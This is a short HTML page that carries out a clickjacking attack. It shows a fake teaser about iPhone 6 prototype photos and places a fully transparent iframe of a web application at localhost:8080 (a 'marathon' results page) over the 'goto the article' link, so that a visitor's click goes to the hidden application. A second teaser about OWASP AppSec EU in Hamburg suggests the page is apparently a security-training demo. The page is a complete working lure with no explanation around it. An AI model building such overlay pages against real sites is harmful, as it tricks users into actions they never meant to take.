<style>
  iframe {
    width:750px;
    height:200px;
    position:absolute;
    top:0; left:0;
    filter:alpha(opacity=00);
    opacity:0.00;
  }
</style>

<div style="position:absolute;top:100px;left:15px;"><b>Read the new Details of iPhone 6</b><br/>
Watch new prototype photos and see hidden features of the new iPhone 6</div>
<iframe src="http://localhost:8080/marathon/showResults.do?marathon=0"></iframe>
<a href="#" style="position:absolute;top:142px;left:15px;z-index:-1">goto the article</a>

<div style="position:absolute;top:190px;left:15px;"><b>OWASP AppSec EU in Hamburg</b><br/>
Read about the top conference in application security</div>
<a href="http://www.heise.de/security/meldung/OWASP-AppSec-Research-2013-Konferenz-und-Trainings-in-Hamburg-1923428.html" style="position:absolute;top:232px;left:15px;">goto the article</a>

